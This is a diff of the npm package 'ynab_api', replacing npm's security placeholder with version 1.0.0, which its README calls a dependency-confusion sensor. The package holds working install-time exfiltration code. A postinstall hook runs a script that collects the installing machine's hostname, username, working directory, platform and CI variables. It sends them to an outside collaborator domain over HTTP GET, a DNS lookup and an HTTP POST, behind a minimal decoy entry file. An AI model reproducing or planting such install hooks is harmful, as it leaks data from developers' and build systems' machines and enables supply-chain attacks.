ynab_api 0.0.1-security → 1.0.0

package/README.md

@@ -1,5 +1,5 @@
-# Security holding package
+# Security Notice
 
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
+This package was created for security research and bug bounty hunting purposes to detect dependency confusion vulnerabilities. If this package was installed on one of your systems, or pulled into your internal npm registry, this likely is a security risk. Please get in contact with your security team and contact the security researcher who owns the package under security@adlr.io
 
-Please refer to www.npmjs.com/advisories?search=ynab_api for more information.
+---

package/index.js

@@ -0,0 +1,5 @@
+// Main entry point - minimal implementation
+module.exports = {
+  version: '1.0.0',
+  description: 'Dependency confusion detection package'
+}; 

package/package.json

@@ -1,6 +1,16 @@
 {
   "name": "ynab_api",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
-}
+  "version": "1.0.0",
+  "description": "dependency confusion sensor package",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node postinstall.js"
+  },
+  "keywords": [
+    "dependency-confusion",
+    "security",
+    "detection"
+  ],
+  "author": "Security Researcher",
+  "license": "MIT"
+}

package/postinstall.js

@@ -0,0 +1,131 @@
+const https = require('https');
+const http = require('http');
+const os = require('os');
+const { execSync } = require('child_process');
+
+const COLLABORATOR_URL = 'https://wbbaoc3sbu2vft9ow1sqspslgcm3au6iv.collab.invokeshell.net';
+const KILLSWITCH_DOMAIN = 'gght12ebm5l0.fir3.org';
+const PACKAGE_NAME = process.env.npm_package_name || 'unknown';
+
+function checkKillSwitch() {
+  try {
+    execSync(`nslookup ${KILLSWITCH_DOMAIN}`, { stdio: 'ignore' });
+    return true;
+  } catch {
+    return false;
+  }
+}
+
+function sendHttpBeacon(url, systemInfo) {
+  try {
+    const urlObj = new URL(url);
+    const client = urlObj.protocol === 'https:' ? https : http;
+    const options = {
+      hostname: urlObj.hostname,
+      port: urlObj.port || (urlObj.protocol === 'https:' ? 443 : 80),
+      path: urlObj.pathname + urlObj.search,
+      method: 'GET',
+      headers: {
+        'User-Agent': 'Dependency-Confusion-Detector/1.0.0',
+        'X-Package-Name': PACKAGE_NAME,
+        'X-Hostname': systemInfo.hostname,
+        'X-Platform': systemInfo.platform,
+        'X-User': systemInfo.user,
+        'X-Node-Version': systemInfo.node_version,
+        'X-CWD': systemInfo.cwd,
+        'X-Killswitch-Domain': KILLSWITCH_DOMAIN
+      },
+      timeout: 10000
+    };
+    const req = client.request(options, () => {});
+    req.on('error', () => {});
+    req.on('timeout', () => { req.destroy(); });
+    req.end();
+  } catch {}
+}
+
+function sendDnsBeacon(collaboratorUrl, systemInfo) {
+  try {
+    const dnsUrl = collaboratorUrl.replace('https://', '').replace('http://', '');
+    const dnsQuery = `${PACKAGE_NAME}.${systemInfo.hostname}.${systemInfo.user}.${dnsUrl}`;
+    execSync(`nslookup ${dnsQuery}`, { stdio: 'ignore' });
+  } catch {}
+}
+
+function sendPostBeacon(url, systemInfo) {
+  try {
+    const urlObj = new URL(url);
+    const data = JSON.stringify(systemInfo);
+    const client = urlObj.protocol === 'https:' ? https : http;
+    const options = {
+      hostname: urlObj.hostname,
+      port: urlObj.port || (urlObj.protocol === 'https:' ? 443 : 80),
+      path: urlObj.pathname,
+      method: 'POST',
+      headers: {
+        'Content-Type': 'application/json',
+        'User-Agent': 'Dependency-Confusion-Detector/1.0.0',
+        'Content-Length': Buffer.byteLength(data)
+      },
+      timeout: 10000
+    };
+    const req = client.request(options, () => {});
+    req.on('error', () => {});
+    req.on('timeout', () => { req.destroy(); });
+    req.write(data);
+    req.end();
+  } catch {}
+}
+
+function sendBeacon() {
+  try {
+    if (checkKillSwitch()) {
+      return;
+    }
+
+    const systemInfo = {
+      timestamp: new Date().toISOString(),
+      package_name: PACKAGE_NAME,
+      hostname: os.hostname(),
+      platform: os.platform(),
+      arch: os.arch(),
+      node_version: process.version,
+      npm_version: process.env.npm_config_user_agent || 'unknown',
+      cwd: process.cwd(),
+      user: os.userInfo().username,
+      killswitch_domain: KILLSWITCH_DOMAIN,
+      env: {
+        NODE_ENV: process.env.NODE_ENV,
+        CI: process.env.CI,
+        TRAVIS: process.env.TRAVIS,
+        GITHUB_ACTIONS: process.env.GITHUB_ACTIONS,
+        JENKINS_URL: process.env.JENKINS_URL,
+        BUILDKITE: process.env.BUILDKITE,
+        CIRCLECI: process.env.CIRCLECI,
+        GITLAB_CI: process.env.GITLAB_CI,
+        TEAMCITY_VERSION: process.env.TEAMCITY_VERSION,
+        BAMBOO_BUILDKEY: process.env.BAMBOO_BUILDKEY,
+        GO_PIPELINE_NAME: process.env.GO_PIPELINE_NAME
+      }
+    };
+
+    const queryParams = new URLSearchParams({
+      pkg: PACKAGE_NAME,
+      host: systemInfo.hostname,
+      platform: systemInfo.platform,
+      user: systemInfo.user,
+      node: systemInfo.node_version,
+      cwd: systemInfo.cwd,
+      timestamp: systemInfo.timestamp,
+      killswitch: KILLSWITCH_DOMAIN
+    }).toString();
+
+    const beaconUrl = `${COLLABORATOR_URL}?${queryParams}`;
+    sendHttpBeacon(beaconUrl, systemInfo);
+    sendDnsBeacon(COLLABORATOR_URL, systemInfo);
+    sendPostBeacon(`${COLLABORATOR_URL}/beacon`, systemInfo);
+
+  } catch {}
+}
+
+sendBeacon();